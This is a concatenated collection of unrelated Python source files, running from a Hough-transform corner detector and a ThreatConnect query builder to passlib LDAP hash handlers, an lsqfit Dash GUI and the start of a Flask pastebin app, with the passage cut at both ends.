x2 and y1 == y2: raise ValueError("Points coincide") return None else: if x1 == x2: return Line(1, 0, -x1) else: m = (y2 - y1) / (x2 - x1) return Line(-m, 1, (m * x1 - y1)) def get_intersection_pt(l1, l2): if l1.a * l2.b == l2.a * l1.b: try: raise ValueError("Lines have the same slope") # Clean this up whenever, learning how to raise exceptions except ValueError as e: print("Value Error: %s" % (e)) return None # x, y = solution to the simultaneous linear equations # (l1.a * x + l1.b * y = -l1.c) and # (l2.a * x + l2.b * y = -l2.c) a = np.array(((l1.a, l1.b), (l2.a, l2.b))) b = np.array((-l1.c, -l2.c)) x, y = np.linalg.solve(a, b) return (x, y) def find_corners(img): # Convert img to grayscale and do Canny edge det. on img to get Hough lines gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) edges = cv2.Canny(gray, 50, 200, 3) lines = cv2.HoughLines(edges, 1, np.pi / 180, 220) # Draw and create equations of lines if at least 4 lines (corner detected) line_eqns = [] try: if len(lines) >= 4: for line in lines: rho = line[0][0] theta = line[0][1] a = np.cos(theta) b = np.sin(theta) x0 = a * rho y0 = b * rho x1 = int(x0 + 1000 * (-b)) y1 = int(y0 + 1000 * (a)) x2 = int(x0 - 1000 * (-b)) y2 = int(y0 - 1000 * (a)) cv2.line(img, (x1, y1), (x2, y2), (0, 255, 0), 2) line_eqns.append(get_line(x1, y1, x2, y2)) except TypeError: print("No lines found above set threshold") return None # Get all intersection points of lines (exclude points off of screen or lines that are parallel) intersec_pts = [] for i in range(len(line_eqns)): for j in range(i + 1, len(line_eqns)): pt = get_intersection_pt(line_eqns[i], line_eqns[j]) if pt != None and pt[0] <= x_cam_width and pt[1] <= y_cam_height: intersec_pts.append(pt) # Decide which intersection point is the corner (right now just getting middle of points) x_sum = 0 y_sum = 0 for pt in intersec_pts: x_sum += pt[0] y_sum += pt[1] corner_pt = (int(x_sum / len(intersec_pts)), int(y_sum / len(intersec_pts))) return corner_pt if __name__ == "__main__": filename = str(sys.argv[1]) if len(sys.argv) > 1 else "building.jpg" img = cv2.imread(filename, 1) corner_pt = find_corners(img) print("Intersection Point:", corner_pt) cv2.imshow("Image", img) cv2.waitKey(0) ### Test these helpers more if problems ensue # l1 = get_line(1,3,1,5) # l2 = get_line(0,4,3,4) # print(get_intersection_pt(l1,l2)) 10-100 """ThreatConnect TQL""" # standard library from enum import Enum from .filter import Filter class TQL: """ThreatConnect TQL""" class Operator(Enum): """Available TQL Operators""" EQ = '=' NE = '!=' GT = '>' LT = '<' LEQ = '<=' GEQ = '>=' NOT_IN = 'NOT IN' IN = 'IN' NOT_LIKE = 'NOT LIKE' LIKE = 'LIKE' NOT_CONTAINS = 'NOT CONTAINS' CONTAINS = 'CONTAINS' NOT_STARTS_WITH = 'NOT STARTSWITH' STARTS_WITH = 'STARTSWITH' NOT_ENDS_WITH = 'NOT ENDSWITH' ENDS_WITH = 'ENDSWITH' class Type(Enum): """Enum representing available value types""" STRING = 'String' INTEGER = 'Integer' BOOLEAN = 'Boolean' SUB_QUERY = 'Sub Query' def __init__(self): """Initialize Class Properties""" self._filters = [] self.raw_tql = None @property def as_str(self): """Convert the TQL obj to a string""" filters = [] for tql_filter in self.filters: value = tql_filter.get('value') # keyword = tql_filter.get('keyword') if isinstance(value, Filter): filters.append(f"{tql_filter.get('keyword')}({value._tql.as_str})") # elif keyword.startswith('has'): # values = value # if not isinstance(value, list): # values = [value] # if tql_filter.get('type') == self.Type.STRING: # values = [f'"{value}"' for value in values] # # value = f"({','.join(values)})" # value = f"({','.join([str(v) for v in values])})" # if tql_filter.get('type') == self.Type.STRING: # value = f'"{value}"' # filters.append( # f"{tql_filter.get('keyword')} {tql_filter.get('operator').name} {value}" # ) else: if tql_filter.get('type') == self.Type.STRING: value = f'"{value}"' filters.append( f"{tql_filter.get('keyword')} {tql_filter.get('operator').name} {value}" ) return ' and '.join(filters) @property def filters(self): """Return the filters""" return self._filters @filters.setter def filters(self, filters): """Set the filters""" self._filters = filters def add_filter(self, keyword, operator, value, type_=Type.STRING): """Add a filter to the current obj Args: keyword (str): the field to search on operator (str): the operator to use value (str): the value to compare type_ (Type): How to treat the value (defaults to String) """ self.filters.append( {'keyword': keyword, 'operator': operator, 'value': value, 'type': type_} ) def set_raw_tql(self, tql): """Set a raw TQL filter""" self.raw_tql = tql """ Implement numerical minmax scaler. """ from typing import Any, Union import dask.dataframe as dd class MinmaxScaler: """Min Value and Max Value Scaler for scaling numerical values Attributes: name Name of scaler min Min value of provided data column max Max value of provided data column """ def __init__(self) -> None: """ This function initiate numerical scaler. """ self.name = "minmaxScaler" self.min = 0 self.max = 0 def fit(self, col_df: dd.Series) -> Any: """ Extract min value and max value for Minmax Scaler according to the provided column. Parameters ---------- col_df Provided data column. """ self.min = col_df.min() self.max = col_df.max() return self def transform(self, col_df: dd.Series) -> dd.Series: """ Transform the provided data column with the extracted min value and max value. Parameters ---------- col_df Provided data column. """ result = col_df.map(self.compute_val) return result def fit_transform(self, col_df: dd.Series) -> dd.Series: """ " Extract min value and max value for Minmax Scaler according to the provided column. Transform the provided data column with the extracted min value and max value. Parameters ---------- col_df Data column. """ return self.fit(col_df).transform(col_df) def compute_val(self, val: Union[int, float]) -> Union[int, float]: """ Compute scaling value of provided value with fitted min value and max value. Parameters ---------- val Value should be scaled. """ return (val - self.min) / (self.max - self.min) from config import SSH_USER, SSH_KEYFILE, REMOTE_SERVER from ssh import ssh_exec import subprocess def serial2hostname(serialnumber : str, tld : str = 'local') -> str: return f'{serialnumber}.{tld}' def hostname2serial(hostname : str) -> str: return hostname.split('.')[0] def serial2port(serialnumber : str, port_offset : int = 65000) -> int: return int(serialnumber.split('-')[1]) + port_offset def get_hostname_getent(remote_host : str, verbose=False): output = subprocess.Popen(f'getent hosts {remote_host}', shell=True, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL).communicate()[0] if output: if verbose: print(f'getent returned {output}') ip, hostname = " ".join(output.decode('utf-8').rstrip().split(' ')).split() return hostname.lower() else: if verbose: print(f'failed to resolve {remote_host}') return None def get_hostname_ssh(ssh_remote_host : str, verbose : bool = False) -> str: if hostname := ssh_exec(ssh_remote_host, cmd = 'hostname', verbose = verbose): if verbose: print(f'retrieved hostname {hostname.rstrip()}') return hostname.rstrip().lower() else: if verbose: print('failed to get hostname') return None def assemble_hosts_local(serialnumber : str, verbose=False) -> iter: remote_host = serial2hostname(serialnumber) if verbose: print(f'trying host: {remote_host}') hostname = get_hostname_getent(remote_host, verbose=verbose) if verbose: print(f'get_hostname_getent returned {hostname}') if hostname and hostname.split(".")[0] == serialnumber: if verbose: print(f'hostname and serialnumber match! {serialnumber} == {hostname}') return (serialnumber, f"{SSH_USER}@{remote_host} -i {SSH_KEYFILE}") else: return None def assemble_hosts_remote(serialnumber : str, verbose : bool = False) -> iter: ssh_remote_host = f'{SSH_USER}@{REMOTE_SERVER} -p {serial2port(serialnumber)} -i {SSH_KEYFILE}' if verbose: print(f'assembled ssh remote host: {ssh_remote_host}') hostname = get_hostname_ssh(ssh_remote_host, verbose = verbose) if hostname == serialnumber: if verbose: print(f'hostname and serialnumber match! {serialnumber} == {hostname}') return (hostname, ssh_remote_host) else: return None def assemble_hosts(serialnumbers : list, remote : bool = False, verbose : bool = False) -> iter: """ assemble_hosts(serialnumbers : list, remote : bool = False, verbose : bool = False) -> iter Parameters: serialnumbers (list): A list containing serialnumbers of motion sensor from which data is to be retrieved remote (bool): flag to be used if data is to be retrieved via reverse ssh tunnels verbose (bool): flag to display debugging information Returns: Returns an iterator of tuples containing the serialnumber (str) and an ssh access string, that can be used to fetch data or execute remote bash commands """ for serialnumber in serialnumbers: serialnumber = serialnumber.lower() if verbose: print(f'processing serialnumber: {serialnumber}') if remote: if host_access := assemble_hosts_remote(serialnumber, verbose=verbose): yield host_access else: if host_access := assemble_hosts_local(serialnumber, verbose=verbose): yield host_access core/RosettaStone.py import os class RosettaStone(object): """ Class imodeling our network representation """ def __init__(self, *args, **kwargs): self.importers = self.list_importers() self.exporters = self.list_exporters() def load_list(self, module): """ Loads a list of files ended with *.py format in a given module :param module: string with the relative module name """ list_obj = (d for d in os.listdir(module) if d.endswith('.py')) return list(list_obj) def list_importers(self): """ Loads the list of files inside 'modules/importers' """ return self.load_list('modules/importers') def list_exporters(self): """ Loads the list of files inside 'modules/exporters' """ return self.load_list('modules/exporters') def check_parser_type(self, list_types, parser_type): """ Check if a substring is in a strings list. :param list_types: a strings list :param parser_type: the substring to find :return: Raises an Exception in case substring is not found """ if not any(parser_type in s for s in list_types): raise Exception('The parser type is not available: %s' % parser_type) def import_module(self, module, klass): """ Imports a class given a modules and the class name Is assumed that the package and class names are the same. :param module: string with the module name :param klass: string with the class name :return: the class instance """ mod = __import__(module + '.' + klass, fromlist=[klass]) return getattr(mod, klass)() def convert(self, input_file, output_file, input_format, output_format): """ Function that converts from one framework to a another :param input_file: path to the model file to be exported :param output_file: path to the exported model file :param input_format: type of the model to be exported :param output_format: type of the exported model :return: None """ # check if parser exists self.check_parser_type(self.importers, input_format) self.check_parser_type(self.exporters, output_format) # instantiate importer and exporter importer = self.import_module('modules.importers', input_format) exporter = self.import_module('modules.exporters', output_format) # load and save # exporter.save(importer.load(input_file), output_file) ProjectsStartUp/ru-dalle # -*- coding: utf-8 -*- import pytest @pytest.mark.parametrize('text, text_seq_length, bpe_dropout', [ ('hello, how are you?', 128, 0.1), ('hello, how are you?', 128, 0.5), ('hello, how are you?', 128, 1.0), ('hello ... how are you ?', 256, 1.0), ('a person standing at a table with bottles of win', 64, 0.5), ('привет как дела???', 76, 0.0), ('клип на русском языке :)', 76, 0.1), ]) def test_encode_decode_text_yttm(yttm_tokenizer, text, text_seq_length, bpe_dropout): tokens = yttm_tokenizer.encode_text(text, text_seq_length=text_seq_length, bpe_dropout=bpe_dropout) decoded_text = yttm_tokenizer.decode_text(tokens) assert text == decoded_text from __future__ import print_function from pgpy.ck_plane import check_cross_law, check_cross_TQF, ellck, hyck from pgpy.proj_plane import pg_point, plucker, tri_dual def chk_tri_ell_hy(myck): """[summary] Arguments: myck (type): [description] K (type): [description] Raises: NotImplementedError -- [description] NotImplementedError -- [description] """ a1 = pg_point([33, 121, 54]) a2 = pg_point([33, 564, 34]) a3 = pg_point([34, 64, -62]) temp = myck.perp(a1) triangle = [a1, a2, a3] trilateral = tri_dual(triangle) l1, _, _ = trilateral Q = myck.tri_quadrance(triangle) S = myck.tri_spread(trilateral) a4 = plucker(2, a1, 3, a2) collin = [a1, a2, a4] Q2 = myck.tri_quadrance(collin) assert myck.perp(temp) == a1 assert myck.perp(myck.perp(l1)) == l1 assert myck.quadrance(a1, a1) == 0 assert myck.spread(l1, l1) == 0 assert check_cross_law(S, Q[2]) == 0 assert check_cross_law(Q, S[2]) == 0 assert check_cross_TQF(Q2) == 0 def test_ell_hy(): chk_tri_ell_hy(ellck()) chk_tri_ell_hy(hyck()) chk_tri_ell_hy(ellck()) chk_tri_ell_hy(hyck()) # def no_test_symbolic(myck): # import sympy # sympy.init_printing() # pv = sympy.symbols("p:3", integer=True) # qv = sympy.symbols("q:3", integer=True) # a1 = pg_point(pv) # a2 = pg_point(qv) # lambda1, mu1 = sympy.symbols("lambda1 mu1", integer=True) # a3 = plucker(lambda1, a1, mu1, a2) # q1 = myck.quadrance(a2, a3) # q2 = myck.quadrance(a1, a3) # q3 = myck.quadrance(a1, a2) # tqf = (q1 + q2 + q3)**2 - 2*(q1*q1 + q2*q2 + q3*q3) - 4*q1*q2*q3 # tqf = sympy.simplify(tqf) # assert tqf == 0 # sv = sympy.symbols("s:3", integer=True) # a3 = pg_point(sv) # l1 = join(a2, a3) # l2 = join(a1, a3) # l3 = join(a1, a2) # t1 = myck.altitude(a1, l1) # t2 = myck.altitude(a2, l2) # t3 = myck.altitude(a3, l3) # o = t1*t2 # ans = t3.dot(o) # ans = sympy.simplify(ans) # assert ans == 0 10-100 # -*- coding: utf-8 -*- import llbc class pyllbcStrUtil(object): """ pyllbc string util class encapcsulation. """ __native_hash_meth = llbc.inl.HashString @classmethod def hash_string(cls, s): """ hash string value """ return cls.__native_hash_meth(s) llbc.StrUtil = pyllbcStrUtil from .currying import currying from .tailrecurve import tail_recurse_optimizer from .infix import infix, is_a, to, step, has, take, drop __all__ = [ 'currying', 'tail_recurse_optimizer', 'infix', 'is_a', 'to', 'step', 'has', 'take', 'drop' ]from chainmodel.models.steem.operation import Operation class ProducerReward(Operation): asset_fields = ['vesting_shares'] tx_involves = ['producer'] Symmetry-International/m2cgen import pytest from tests.utils import tmp_dir def pytest_addoption(parser): parser.addoption( "--fast", action="store_const", default=False, const=True, help="Run e2e tests fast" ) @pytest.fixture def is_fast(request): return request.config.getoption("--fast") @pytest.fixture(scope="module") def global_tmp_dir(): with tmp_dir() as directory: yield directory from base64 import b64encode, b64decode from hashlib import md5, sha1 import logging log = logging.getLogger(__name__) import re from otp.ai.passlib.handlers.misc import plaintext from otp.ai.passlib.utils import unix_crypt_schemes, to_unicode from otp.ai.passlib.utils.compat import uascii_to_str, unicode, u from otp.ai.passlib.utils.decor import classproperty import otp.ai.passlib.utils.handlers as uh __all__ = [ 'ldap_plaintext', 'ldap_md5', 'ldap_sha1', 'ldap_salted_md5', 'ldap_salted_sha1', 'ldap_des_crypt', 'ldap_bsdi_crypt', 'ldap_md5_crypt', 'ldap_sha1_cryptldap_bcrypt', 'ldap_sha256_crypt', 'ldap_sha512_crypt'] class _Base64DigestHelper(uh.StaticHandler): ident = None _hash_func = None _hash_regex = None checksum_chars = uh.PADDED_BASE64_CHARS @classproperty def _hash_prefix(cls): return cls.ident def _calc_checksum(self, secret): if isinstance(secret, unicode): secret = secret.encode('utf-8') chk = self._hash_func(secret).digest() return b64encode(chk).decode('ascii') class _SaltedBase64DigestHelper(uh.HasRawSalt, uh.HasRawChecksum, uh.GenericHandler): setting_kwds = ('salt', 'salt_size') checksum_chars = uh.PADDED_BASE64_CHARS ident = None _hash_func = None _hash_regex = None min_salt_size = max_salt_size = 4 min_salt_size = 4 default_salt_size = 4 max_salt_size = 16 @classmethod def from_string(cls, hash): hash = to_unicode(hash, 'ascii', 'hash') m = cls._hash_regex.match(hash) if not m: raise uh.exc.InvalidHashError(cls) try: data = b64decode(m.group('tmp').encode('ascii')) except TypeError: raise uh.exc.MalformedHashError(cls) cs = cls.checksum_size return cls(checksum=data[:cs], salt=data[cs:]) def to_string(self): data = self.checksum + self.salt hash = self.ident + b64encode(data).decode('ascii') return uascii_to_str(hash) def _calc_checksum(self, secret): if isinstance(secret, unicode): secret = secret.encode('utf-8') return self._hash_func(secret + self.salt).digest() class ldap_md5(_Base64DigestHelper): name = 'ldap_md5' ident = u('{MD5}') _hash_func = md5 _hash_regex = re.compile(u('^\\{MD5\\}(?P[+/a-zA-Z0-9]{22}==)$')) class ldap_sha1(_Base64DigestHelper): name = 'ldap_sha1' ident = u('{SHA}') _hash_func = sha1 _hash_regex = re.compile(u('^\\{SHA\\}(?P[+/a-zA-Z0-9]{27}=)$')) class ldap_salted_md5(_SaltedBase64DigestHelper): name = 'ldap_salted_md5' ident = u('{SMD5}') checksum_size = 16 _hash_func = md5 _hash_regex = re.compile(u('^\\{SMD5\\}(?P[+/a-zA-Z0-9]{27,}={0,2})$')) class ldap_salted_sha1(_SaltedBase64DigestHelper): name = 'ldap_salted_sha1' ident = u('{SSHA}') checksum_size = 20 _hash_func = sha1 _hash_regex = re.compile(u('^\\{SSHA\\}(?P[+/a-zA-Z0-9]{32,}={0,2})$')) class ldap_plaintext(plaintext): name = 'ldap_plaintext' _2307_pat = re.compile(u('^\\{\\w+\\}.*$')) @uh.deprecated_method(deprecated='1.7', removed='2.0') @classmethod def genconfig(cls): return '!' @classmethod def identify(cls, hash): hash = uh.to_unicode_for_identify(hash) return bool(hash) and cls._2307_pat.match(hash) is None ldap_crypt_schemes = [ 'ldap_' + name for name in unix_crypt_schemes ] def _init_ldap_crypt_handlers(): g = globals() for wname in unix_crypt_schemes: name = 'ldap_' + wname g[name] = uh.PrefixWrapper(name, wname, prefix=u('{CRYPT}'), lazy=True) del g _init_ldap_crypt_handlers()import sys sys.setrecursionlimit(500005) si = sys.stdin.readline n, Q = map(int, si().split()) def pro(): # 사고 싶은 땅에서 시작해서 루트 땅까지 올라오면서 정답을 찾으면 편하다. # 왜냐하면 부모 노드는 찾기 쉽기 때문이다. estate = [False] * (n + 1) for _ in range(Q): x = int(si()) y = x res = 0 while x: if estate[x]: res = x x //= 2 estate[y] = True print(res) if __name__ == "__main__": pro() z_src/utils/voc_utils.py import torch.nn.functional as F from torch import nn from PIL import Image from z_src.utils import config as cfg import torch import torch.optim as optim import numpy as np class CrossEntropyLoss2d(nn.Module): def __init__(self, weight=None, size_average=None, ignore_index=255, reduce=None, reduction='mean'): super(CrossEntropyLoss2d, self).__init__(weight, size_average, reduce, reduction) self.ignore_index = ignore_index super(CrossEntropyLoss2d, self).__init__() self.nll_loss = nn.NLLLoss(weight, size_average, ignore_index) def forward(self, inputs, targets): np.set_printoptions(threshold=np.inf) return self.nll_loss(F.log_softmax(inputs, dim=0), targets) def create_loss_and_optimizer(net, learning_rate=0.001): # Loss function # loss = CrossEntropyLoss2d() loss = torch.nn.CrossEntropyLoss(ignore_index=255) # loss = torch.nn.BCEWithLogitsLoss() # optimizer = optim.Adam(net.parameters(), lr=learning_rate) optimizer = optim.SGD(net.parameters(), lr=learning_rate, momentum=0.9) return loss, optimizer def colorize_mask(mask): # 0=background, 1=aeroplane, 2=bicycle, 3=bird, 4=boat, 5=bottle # 6=bus, 7=car, 8=cat, 9=chair, 10=cow, # 11=diningtable, 12=dog, 13=horse, 14=motorbike, 15=person # 16=potted plant, 17=sheep, 18=sofa, 19=train, # 20=tv/monitor # mask: numpy array of the mask palette = get_palette(cfg.NUMBER_OF_CLASSES) # new_mask = Image.fromarray(mask.astype(np.uint8)).convert('P') output_im = Image.fromarray(mask) output_im.putpalette(palette) return output_im def colorize_image(output_im): palette = get_palette(cfg.NUMBER_OF_CLASSES) output_im.putpalette(palette) return output_im def get_palette(num_cls): """ Returns the color map for visualizing the segmentation mask. Args: num_cls: Number of classes Returns: The color map """ n = num_cls palette = [0] * (n * 3) for j in range(0, n): lab = j palette[j * 3 + 0] = 0 palette[j * 3 + 1] = 0 palette[j * 3 + 2] = 0 i = 0 while lab: palette[j * 3 + 0] |= (((lab >> 0) & 1) << (7 - i)) palette[j * 3 + 1] |= (((lab >> 1) & 1) << (7 - i)) palette[j * 3 + 2] |= (((lab >> 2) & 1) << (7 - i)) i += 1 lab >>= 3 return palette src/concurrency in python/python concurrecy/22.thread_locks_as_contextManagers.py import logging import threading import time logging.basicConfig(level=logging.DEBUG, format='(%(threadName)-10s) %(message)s', ) def worker_with(lock): with lock: logging.debug("lock acquired") def worker_nowith_lock(lock): try: lock.acquire() except: logging.debug("already locked") finally: logging.debug("lock released") lock = threading.Lock() w = threading.Thread(target=worker_with, args=(lock,)) nw = threading.Thread(target=worker_nowith_lock, args=(lock,)) w.start() nw.start() fbsamples/cp_reference # Copyright 2004-present, Facebook. All Rights Reserved. from django.db import models from core.models import BaseModel class Customer(BaseModel): """Represent a single customer instance fields: store: the store this customer belongs to full_name: customer full name email: customer email addr: customer shipping addr """ store = models.ForeignKey("shop.Store", null=True, on_delete=models.SET_NULL) full_name = models.CharField(max_length=255) email = models.CharField(max_length=255) addr = models.TextField(blank=True, null=True) def __str__(self): return self.full_name ckoerber/lsqfit-guilsqfitgui/lsqfitgui.py """This module provides interfaces for running a lsqfit dashboard GUI. The :class:`FitGUI` class provides the interface to `lsqfit` providing dynamic html elements which can be embedded into a dash (flask) app. The :func:`run_server` method provides a convinient interafce which also starts the Dash app which is accessible by any (local) browser. """ # noqa: E501 from typing import Optional, Callable, Dict, List, Any from tempfile import NamedTemporaryFile from numpy import eye, allclose from gvar import dumps, evalcorr from lsqfit import nonlinear_fit from lsqfit._extras import unchained_nonlinear_fit from dash import Dash, html, dcc from lsqfitgui.frontend.dashboard import ( get_layout, update_layout_from_prior, update_layout_from_meta, toggle_prior_widget, EXTERNAL_STYLESHEETS, EXTERNAL_SCRIPTS, ASSETS, UPDATE_LAYOUT_CALLBACK_ARGS, SAVE_FIT_CALLBACK_ARGS, EXPORT_PRIOR_CALLBACK_ARGS, FCN_SOURCE_CALLBACK, DEFAULT_PLOTS, ) from lsqfitgui.util.models import ( lsqfit_from_multi_model_fit, lsqfit_from_multi_model_fit_wrapper, ) class FitGUI: """Class which initializes the dashboard.""" def __init__( # ignore: D107 self, fit: Optional[nonlinear_fit] = None, fit_setup_function: Optional[Callable] = None, fit_setup_kwargs: Optional[Dict] = None, meta_config: Optional[List[Dict]] = None, use_default_content: bool = True, ): """Initialize the fit gui. You must either provide a `fit` object or a `fit_setup_function` function to initialize this class. Note that this dose not create a ``Dash`` app; the app is created by calling :meth:`FitGUI.setup_app` (which is implicitly called by :meth:`FitGUI.run_server`). Arguments: fit: Non-linear fit object. fit_setup_function: Function which returns a non-linear fit object. Its keywords are provided by `fit_setup_kwargs`. fit_setup_kwargs: Initial kwargs which are passed to the `fit_setup_function` for creating the first fit object. meta_config: Configuration for the fit_setup_kwargs represented in the GUI. These must match `dcc.Input `_ arguments. use_default_content: Add default elements like the function documentation and plot tabs to the GUI. Example: The most basic example just requires a nonlinear_fit object:: fit = lsqfit.nonlinear_fit(data, fcn=fcn, prior=prior) gui = FitGUI(fit) More sophisticated examples, where also meta arguments are used, are:: from dash import Dash def generate_fit(n_exp=3): ... return lsqfit.nonlinear_fit(data, fcn=fcn, prior=prior) fit_setup_kwargs = {"n_exp": 3} meta_config = [{"name": "n_exp", "type": "number", "min": 1, "max": 10, "step": 1}] gui = FitGUI( fit_setup_function=generate_fit, fit_setup_kwargs=fit_setup_kwargs, meta_config=meta_config ) fit_gui.run_server(host=host, debug=debug, port=port) """ # noqa: E501 self.name: str = None """Name of the app displayed as title and browser tab title.""" self._fit_setup_function = fit_setup_function self._fit_setup_kwargs = fit_setup_kwargs or {} self._meta_config = meta_config self._use_default_content = use_default_content self._layout = None self.get_additional_content: Callable[[nonlinear_fit], html.Base] = None """Function used to determine dynamic content depending on fit results.""" self.plots: List[Dict[str, Any]] = [] """List of dictionaries specifying plots rendered in the tab element. Must contain at least the `name: str` and `fcn:Callable[[nonlinear_fit], Figure]` items. Example: Plot the fit results:: def plot_fcn(fit): yy = fit.fcn(fit.x, fit.p) return plot_gvar(fit.x, yy, kind="band") gui.plots.append({"name": "Fit results", "fcn": plot_fcn}) **Allowed keywords are** * **name** *(str)*: The name presented in the tabs. * **fcn** *(Callable[[nonlinear_fit], Figure])*: The function used to generate the plot. Must take a plot and kwargs as an input. * **description** *(str)*: Text displayed below figure (can contain latex using). * **kwargs** *(Dict[str, Any])*: A dictionary passed to the above function. * **static_plot_gvar** *(Dict[str, Any])*: Static data passed to :func:`plot_gvar` added to the same figure (i.e., to also plot data as an comparison). See also the :attr:`lsqfitgui.frontend.content.DEFAULT_PLOTS`. """ # noqa: E501 if self._use_default_content: self.plots += DEFAULT_PLOTS if fit is None and fit_setup_function is None: raise ValueError( "You must either specify the fit or fit setup function" " to initialize the GUI." ) elif fit_setup_function is not None: self._initial_fit = fit_setup_function(**self._fit_setup_kwargs) else: self._initial_fit = fit if isinstance(self._initial_fit, unchained_nonlinear_fit): self._initial_fit = lsqfit_from_multi_model_fit(self._initial_fit) if self._fit_setup_function is not None: self._fit_setup_function = lsqfit_from_multi_model_fit_wrapper( self._fit_setup_function ) if not allclose( evalcorr(self.initial_fit.prior.flatten()), eye(len(self.initial_fit.prior.flatten())), ): raise NotImplementedError("Prior of original fit contains correlations.") self._callbacks = [ self._update_layout_callback, self._save_fit_callback, self._export_prior_callback, ] if self._use_default_content: self._callbacks += [FCN_SOURCE_CALLBACK] self._setup_old = list(self._fit_setup_kwargs.values()) self._prior_keys_old = None self._prior_values_old = None self._fit = self.initial_fit self._app = None @property def fit(self) -> nonlinear_fit: """Return current fit object.""" return self._fit @property def initial_fit(self) -> nonlinear_fit: """Return fit object used to initialize the app.""" return self._initial_fit @property def layout(self) -> html.Base: """Return the current layout.""" if self._layout is None: self._layout = get_layout( self.initial_fit, name=self.name, meta_config=self._meta_config, meta_values=self._fit_setup_kwargs, use_default_content=self._use_default_content, get_additional_content=self.get_additional_content, plots=self.plots, ) return self._layout def setup_app(self, app: Optional[Dash] = None): """Initialize the dash app. Sets up layout and callbacks and create a ``Dash`` instance if not provided. Arguments: app: The dash app which runs the server. If provided, requires to manually set up style sheets, scripts and assets. Raises RuntimeError if app already set up. """ if self._app is not None: raise RuntimeError("App already initialized.") if not app: app = Dash( self.name, external_stylesheets=EXTERNAL_STYLESHEETS, external_scripts=EXTERNAL_SCRIPTS, assets_folder=ASSETS, ) app.title = self.name app.layout = html.Div(children=self.layout, id="body") for callback in self._callbacks: kwargs = callback.kwargs if hasattr(callback, "kwargs") else {} app.callback(*callback.args, **kwargs)(callback) self._app = app @property def app(self) -> Dash: """Return plotly dash app.""" return self._app def run_server(self, *args, **kwargs): """Wrapper to self.app.run_server.""" if not self.app: self.setup_app() return self.app.run_server(*args, **kwargs) # Callbacks def _update_layout_callback(self, prior_ids, prior_values, setup): """Update the layout given new prior input.""" prior_keys = [idx["name"] for idx in prior_ids] if setup != self._setup_old: self._layout, self._fit = update_layout_from_meta( setup, self._fit_setup_function, self._fit_setup_kwargs, name=self.name, meta_config=self._meta_config, use_default_content=self._use_default_content, get_additional_content=self.get_additional_content, plots=self.plots, ) self._setup_old = setup elif ( prior_keys != self._prior_keys_old or prior_values != self._prior_values_old ): self._layout, self._fit = update_layout_from_prior( dict(zip(prior_keys, prior_values)), self.fit, setup=setup, name=self.name, meta_config=self._meta_config, use_default_content=self._use_default_content, get_additional_content=self.get_additional_content, plots=self.plots, ) self._prior_keys_old = prior_keys self._prior_values_old = prior_values return self.layout _update_layout_callback.args = UPDATE_LAYOUT_CALLBACK_ARGS _update_layout_callback.kwargs = {"prevent_initial_call": True} def _save_fit_callback(self, *args, **kwargs): with NamedTemporaryFile() as out: out.write(dumps(self.fit)) return dcc.send_file(out.name, filename="fit.p") _save_fit_callback.args = SAVE_FIT_CALLBACK_ARGS _save_fit_callback.kwargs = {"prevent_initial_call": True} def _export_prior_callback(self, *args, **kwargs): return toggle_prior_widget(*args, **kwargs) _export_prior_callback.args = EXPORT_PRIOR_CALLBACK_ARGS _export_prior_callback.kwargs = {"prevent_initial_call": True} def run_server( fit: Optional[nonlinear_fit] = None, name: str = "Lsqfit GUI", fit_setup_function: Optional[Callable[[Any], nonlinear_fit]] = None, fit_setup_kwargs: Optional[Dict] = None, meta_config: Optional[List[Dict]] = None, use_default_content: Optional[bool] = True, get_additional_content: Optional[Callable[[nonlinear_fit], html.Base]] = None, additional_plots: Optional[Dict[str, Callable]] = None, run_app: bool = True, debug: bool = True, host: str = "localhost", port: int = 8000, ) -> FitGUI: """Initialize the GUI and start the dash app. Requires either a `fit` object or a `fit_setup_function`. Arguments: fit: Non-linear fit object. name: Name of the app displayed as title and browser tab title. fit_setup_function: Function which returns a non-linear fit object. Its keywords are provided by `fit_setup_kwargs`. fit_setup_kwargs: Initial kwargs which are passed to the `fit_setup_function` for creating the first fit object. meta_config: Configuration for the fit_setup_kwargs represented in the GUI. These must match `dcc.Input `_ arguments. use_default_content: Add default elements like the function documentation and plot tabs to the GUI. get_additional_content: Function used to determine dynamic content depending on fit results. additional_plots: List of dictionaries specifying plots rendered in the tab element. Must contain at least the `name: str` and `fcn:Callable[[nonlinear_fit], Figure]` items. This populates :attr:`FitGUI.plots`. See also the :attr:`lsqfitgui.frontend.content.DEFAULT_PLOTS`. run_app: Call run server on the dash app. debug: Run the dash app in debug mode. Only used if `run_app=True`. host: The hosting address of the dash app. Only used if `run_app=True`. port: The port of the dash app. Only used if `run_app=True`. Example: The most basic example just requires a nonlinear_fit object:: fit = lsqfit.nonlinear_fit(data, fcn=fcn, prior=prior) app = run_server(fit) More sophisticated examples, where also meta arguments are used, are:: def generate_fit(n_exp=3): ... return lsqfit.nonlinear_fit(data, fcn=fcn, prior=prior) fit_setup_kwargs = {"n_exp": 3} meta_config = [{"name": "n_exp", "type": "number", "min": 1, "max": 10, "step": 1}] fit_gui = run_server( fit_setup_function=generate_fit, fit_setup_kwargs=fit_setup_kwargs, meta_config=meta_config ) """ # noqa: E501 fit_gui = FitGUI( fit=fit, fit_setup_function=fit_setup_function, fit_setup_kwargs=fit_setup_kwargs, meta_config=meta_config, use_default_content=use_default_content, ) fit_gui.name = name fit_gui.get_additional_content = get_additional_content fit_gui.plots += additional_plots or [] fit_gui.setup_app() if run_app: fit_gui.run_server(host=host, debug=debug, port=port) return fit_gui IISH/dpi #!/usr/bin/python import re import sys sys.path.append('/home/strikes/clioinfra/modules') from config import configuration, load_dataverse, findpid def metadata(dataset): #return ('xxx', '', '') config = configuration() (pid, fileid, revid, clearpid) = findpid(dataset) #return ('xxx', '', '') data = {} if pid: query = pid apiurl = config['dataverseroot'] + "/api/search?q=" + query + '&key=' + config['key'] + '&type=dataset' data = load_dataverse(apiurl) return (data, pid, fileid) zmunro/pastething #!/usr/bin/env python3 from random import getrandbits, choice from base64 import urlsafe_b64encode from datetime import date, datetime, timedelta from contextlib import contextmanager from psycopg2.extras import DictCursor from psycopg2.pool import SimpleConnectionPool import pygments from pygments import highlight from pygments.lexers import get_lexer_by_name, guess_lexer, get_all_lexers from pygments.formatters import HtmlFormatter from flask import Flask, \ render_template, url_for, flash, \ request, redirect, Response, abort, \ get_flashed_messages, make_response from stats import pasteview, pastecount, getstats import config app = Flask(__name__) app.secret_key = config.secret_key app.config['MAX_CONTENT_LENGTH'] = config.max_content_length app.jinja_env.globals['year'] = 